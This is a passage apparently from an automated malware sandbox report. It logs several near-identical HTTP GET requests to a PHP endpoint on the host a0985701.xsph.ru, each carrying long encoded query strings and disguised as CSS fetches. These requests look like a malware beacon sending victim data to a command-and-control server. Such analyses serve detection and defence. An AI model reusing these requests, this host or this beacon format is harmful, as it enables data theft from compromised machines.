d50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
